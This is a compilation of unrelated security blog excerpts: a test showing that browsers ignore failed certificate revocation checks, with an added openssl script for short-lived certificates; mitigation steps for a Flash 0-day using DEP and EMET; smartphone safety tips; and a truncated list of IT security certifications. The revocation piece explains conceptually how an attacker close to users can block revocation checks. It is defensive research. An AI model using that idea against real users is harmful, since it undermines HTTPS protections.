But both methods rely on the CA being available to answer CRL or OCSP queries. If a CA went down then it could take out huge sections of the web. Because of this, clients (and I'm thinking mainly of browsers) have historically been forgiving of an unavailable CA.
But an event this week gave me cause to wonder how well revocation actually works. So I wrote the world's dumbest HTTP proxy. It's just a convenient way to intercept network traffic from a browser. HTTPS requests involve the CONNECT method, which is implemented. All other requests (including all revocation checks) simply return a 500 error. This isn't even as advanced as Moxie's trick of returning 3.
To be clear, the proxy is just for testing. An actual attack would intercept TCP connections. The results:
Firstly, IE 8 on Windows 7:
No indication of a problem at all even though the revocation checks returned 500s. It's even EV.
(Aside: I used Wireshark to confirm that revocation checks weren't bypassing the proxy. It's also the case that SChannel can cache revocation information. I don't know how to clear this cache, so I simply used a site that I hadn't visited before. Also confirming that a cache wasn't in effect is the fact that Chrome uses SChannel to verify certificates and Chrome knew that there was an issue..)
Firefox 3.6 on Windows 7, no indication:
Chrome 12 on Windows 7:
There's something at least! We can click on it...
So Chrome has an indication but it's the same indication as mixed-content and I suspect that rather a lot of people will ignore it. There is one saving grace, Chrome implements HSTS and for HSTS sites, revocation failure is fatal:
On other platforms, the story is much the same. Safari doesn't indicate that anything is wrong, nor does Firefox 4 on OS X, nor Firefox 3.6 on Linux. Chrome on Mac is the same as on Windows, but on Linux it doesn't indicate and doesn't protect HSTS sites. (Chrome on Linux's behaviour is due to a limitation in NSS, as I understand it.)
So, what's the effect? Well, it depends where an attacker is. If the attacker is spoofing a site and is situated close to the site then they can attack all users, because they can get all the traffic destined for the site. However, such an attacker probably can't intercept traffic to the CA's servers, so revocation will actually work because the users will receive a firm ‘revoked’ message from the CA. If the attacker is close to the user, then they can only attack a smaller number of users, but they can intercept traffic to the CA and thus defeat revocation. Attacks in Tunisia and on open WiFi networks are the sort of attacks which can defeat revocation.
So should browsers be stricter about revocation checking? Maybe, but it does mean that a CA outage would disable large parts of the web. Imagine if Verisign corrupted their revocation database and were down for six hours while they rebuilt it. A global outage of large parts of the HTTPS web like that would seriously damage the image of web security to the point where sites would think twice about using HTTPS at all.
(You can configure Firefox to be strict about checking if you wish: security.OCSP.require in about:config.)
A much better solution would be for certificates to only be valid for a few days and to forget about revocation altogether. This doesn't mean that the private key needs to change every few days, just the certificate. And the certificate is public data, so servers could just download their refreshed certificate over HTTP periodically and automatically (like OCSP stapling). Clients wouldn't have to perform revocation checks (which are very complex and slow), CAs wouldn't have to pay for massive, DDoS proof serving capacity and revocation would actually work. If the CA went down for six hours, nobody cares. Only if the CA is down for days is there a problem. If you want to “revoke” a certificate, just stop renewing it.
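The short-lived certificate idea from the post, worked through as an added example (this is not the author's code): a throwaway test CA issues a certificate valid for only a few days, and a server's renewal job needs exactly two checks, does the chain still verify and how close to expiry is it. With such certificates "revoking" really is just not renewing, so the clock is the only thing a client has to check. It assumes the openssl command line tool (1.1.1 or later); all names are made up.

```sh
#!/bin/sh
# Added example, not from the post: a 3-day certificate from a test CA and the
# checks a periodic renewal job would run against it.

# make_short_lived_cert <days> <dir>: test CA plus a leaf valid for <days>.
make_short_lived_cert() {
    days=$1; dir=$2
    openssl req -x509 -newkey rsa:2048 -nodes -days 3650 -subj "/CN=Example Test CA" \
        -keyout "$dir/ca.key" -out "$dir/ca.crt" 2>/dev/null
    openssl req -newkey rsa:2048 -nodes -subj "/CN=www.example.test" \
        -keyout "$dir/leaf.key" -out "$dir/leaf.csr" 2>/dev/null
    openssl x509 -req -in "$dir/leaf.csr" -CA "$dir/ca.crt" -CAkey "$dir/ca.key" \
        -CAcreateserial -days "$days" -out "$dir/leaf.crt" 2>/dev/null
}

# cert_verifies <dir>: exit 0 if leaf.crt chains to ca.crt (what a client
# checks, minus the revocation lookup the post is about).
cert_verifies() {
    openssl verify -CAfile "$1/ca.crt" "$1/leaf.crt" >/dev/null 2>&1
}

# cert_valid_for <cert> <seconds>: exit 0 if the certificate will still be
# valid that many seconds from now, 1 if it will have expired by then.
cert_valid_for() {
    openssl x509 -in "$1" -noout -checkend "$2" >/dev/null 2>&1
}

# needs_renewal <cert>: the renewal job's decision. With 3-day certificates,
# re-fetch as soon as less than a day remains; if the CA has been unreachable
# long enough for this to fail repeatedly, that is the time to alarm.
needs_renewal() {
    ! cert_valid_for "$1" 86400
}

# Usage:
#   d=$(mktemp -d); make_short_lived_cert 3 "$d"
#   cert_verifies "$d" && echo "chain OK"
#   needs_renewal "$d/leaf.crt" || echo "more than a day left, nothing to do"
```

Note what is absent: no CRL, no OCSP responder, no revocation check at all on the client side. The private key never changes between renewals, only the certificate, and a certificate the CA stops re-issuing simply ages out within days.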


Blocking Exploit Attempts of the Recent Flash 0-Day

First, customers using Microsoft Office 2010 are not susceptible to the current attacks.  The current attacks do not bypass the Data Execution Prevention security mitigation (DEP).  Microsoft Office 2010 turns DEP on for the core Office applications, and this will also protect Flash Player when it is loaded inside an Office application.  In addition to that, users of the 64 bit edition of Microsoft Office 2010 have even less exposure to the current attacks as the shellcode for all the exploits we’ve seen will only work on a 32 bit process.  What’s more, if an Office document originates from a known unsafe location such as email or the internet, Office 2010 will activate the Protected View feature.

Protected View uses a sandbox that greatly limits the ability of an application to interact with other processes and the system.  Flash content embedded in an Office document originating from an unsafe location runs inside Protected View.  For more information about this feature of Office 2010, please refer to “What is Protected View?”.

For users who want additional protections as well as users of Microsoft Office prior to 2010, the Enhanced Mitigation Experience Toolkit (EMET) can help.  Turning on EMET for the core Office applications will enable a number of security protections called security mitigations.  The exploits we’ve seen so far are broken by three of these mitigations: DEP, Export Address Table Access filtering (EAF), and HeapSpray pre-allocation.  EMET is of value even to Microsoft Office 2010 as it has the first of the three enabled by default, but does not have the second or third ones.

To be protected by EMET, there are a few steps you need to follow.  You first need to download the tool, install it, and then finally configure it to protect an application.  It’s a good idea to configure EMET to protect not just Excel, but all of the Office applications as even though the attacks we’ve seen only target Excel, Flash Player can also be hosted in other Office applications as well.  Configuring EMET for the Office applications is done through the following steps:
  1. Launch the EMET application from the start menu
  2. Click on the “Configure Apps” button
  3. Click the “Add” button
  4. Navigate to where you have Microsoft Office installed and select one of the core office apps.  For example this might be C:\Program Files (x86)\Microsoft Office\Office12\excel.exe.
  5. Select “Open”
  6. Repeat steps 4 through 5 for the other core office applications
  7. Select “Ok”
  8. Restart any of the Office applications that are currently running

Since Flash Player can also be hosted in a web browser, you may wish to turn on EMET for the browser you use.  This can be done by adding the browser executable to the list of protected applications per the above steps.  In general it is a good idea to utilize a browser that opts into DEP by default such as Internet Explorer 8 and 9 (as well as several third party browsers).

Beyond EMET, there is a workaround that Office 2007 users can use to prevent Flash Player (as well as other ActiveX controls) from loading inside an Office application.  This is done by changing the ActiveX setting in the Trust Center to “Disable all controls without notification” as shown in the screenshot below.

The ActiveX setting in the Trust Center can also be set via group policy or registry.   For more information, please refer to “Security policies and settings in the 2007 Office system”.   As a final note, please be aware that the setting has the potential to break add-ons for Microsoft Office.  It is a good idea to test any add-ons you use before making this change too widely.


7 Security Tips For Smartphone

As the mobile phone is the most common device used to access the web worldwide, smartphones have changed the way we work on the move: users shop online, access their bank accounts, stay in touch with friends and use social networks from their phones.

Just as you secure your online information elsewhere, a smartphone user's identity can be stolen and the device hacked. Here are some security tips for smartphone users to keep themselves secure.

Updates for your phone

Keep your phone up to date so that the latest software patches are installed. Just like any other operating system on a desktop or laptop, keeping the software updated is the first line of defence against hackers and malware.

Public Place

WiFi networks have become ubiquitous, but viewing your important information over public WiFi is not secure: anyone on the same network can read unencrypted traffic. Avoid your email program, social networking sites and online shopping while connected to a public network unless the connection is encrypted.

Use Password

Set a password for your phone and enable the screen auto-lock with a short timeout (three minutes at most). It is the simplest way to secure your phone: if it is stolen, nobody can get at your personal information without the password.

Enable a Wipe feature
If you lose your phone and cannot get it back, it is good practice to erase all the information stored on it; a remote wipe application does this for you. Try to choose a wipe application that can clear the external memory card too.

Use Encryption
Cryptography is the art of secret communication, so enable device encryption when it is available. Encryption is not offered on all platforms, but if your phone has the feature, use it.

Use Antivirus
Mobile viruses and malware are growing daily and ever more quickly because of the increasing use of smartphones for banking and other purposes; an attacker can compromise your phone through a backdoor, so protect it against this. Use an antivirus suited to your smartphone's operating system. For a list of antivirus products for the Android operating system, click here.

Avoid Phishing SMS
Smishing is a term combining SMS (Short Message Service) and phishing; you should know about it and be wary of it. In smishing a malicious user sends a message containing a link to a website, where you may be asked to enter your sensitive information (on what is probably a fake page).


Top 5 IT Security Certifications for 2011

In today’s tough IT market having a security certification that recruiters want can mean the difference between getting that next job or not. “A certification today is like a college degree,” says Grad Summers, Americas leader for information security program management services at Ernst & Young. “You may not hire a candidate just because they have one, but it is something that you come to expect in this field.”
Here are the top five security certifications for 2011, compiled by scanning job boards and interviewing IT security recruiters and employers:
Vendor Certifications
A growing need for hands-on network engineers, along with social computing and Web 2.0 technology, has pushed network security even further up the list. Vendor certifications including Cisco's Certified Network Associate (CCNA), Microsoft's Certified Systems Engineer (MCSE) with a focus on security and Check Point's Certified Security Expert (CCSE) top the list as organizations in banking, government and healthcare look to fill open positions including network and system administrators and architects.
CISSP
The popularity of the Certified Information Systems Security Professional (CISSP) is high within the IT security community, as it provides the basis of security knowledge. “We feel safe hiring candidates carrying this validation,” says Ellis Belvins, division director at Robert Half International, a professional staffing consultancy, adding that the certification demonstrates the security professional's high proficiency, commitment and deeper understanding of security concepts, principles and methodologies.
CISSP is viewed as the baseline standard for information security professions in government and industry. Companies are beginning to require CISSP certification for their technical, mid-management and senior management IT security positions. This certification is offered through (ISC)², the not-for-profit consortium that offers IT security certifications and training.
CEH
Certified Ethical Hacker (CEH) is gaining popularity as organizations focus on securing their IT infrastructure and networks from internal and external attacks. CEH is offered by EC-Council and its goal is to certify security practitioners in the methodology of ethical hacking. This vendor-neutral certification covers the standards and language involved in exploiting system vulnerabilities and weaknesses and the countermeasures against them. CEH basically shows candidates how the attacks are actually done. It also attempts to define the legal role of ethical hacking in enterprise organizations.
Some employers aggressively look to hire candidates with CEH validation for hands-on security operations and intelligence activities. “In 2011, we see the need for very specific skill sets which can be obtained through training and certifications such as the CEH,” says Vernon Ross, director of learning and organizational capability at Lockheed Martin Information Systems and Global Solutions.
CISM
Certified Information Security Manager (CISM) is significantly in demand as the profession focuses on the business side of security. CISM, offered by ISACA, addresses the connection between business needs and IT security by focusing on risk management and security organizational issues. “ISACA’s CISM are a few that are on our radar for 2011,” Summers says.
CISM is ideal for IT security professionals looking to grow and build their career into mid-level and senior management positions. In fact, the CISM earned a place on the list of highest paying IT security certifications in the 2010 IT Skills and Certifications Pay Index from independent research firm Foote Partners.
GIAC
The demand is rising for Global Information Assurance Certification (GIAC) in specific disciplines such as digital forensics, intrusion detection, incident handling, security operations and application software security.

If you want to read full article, please go to source.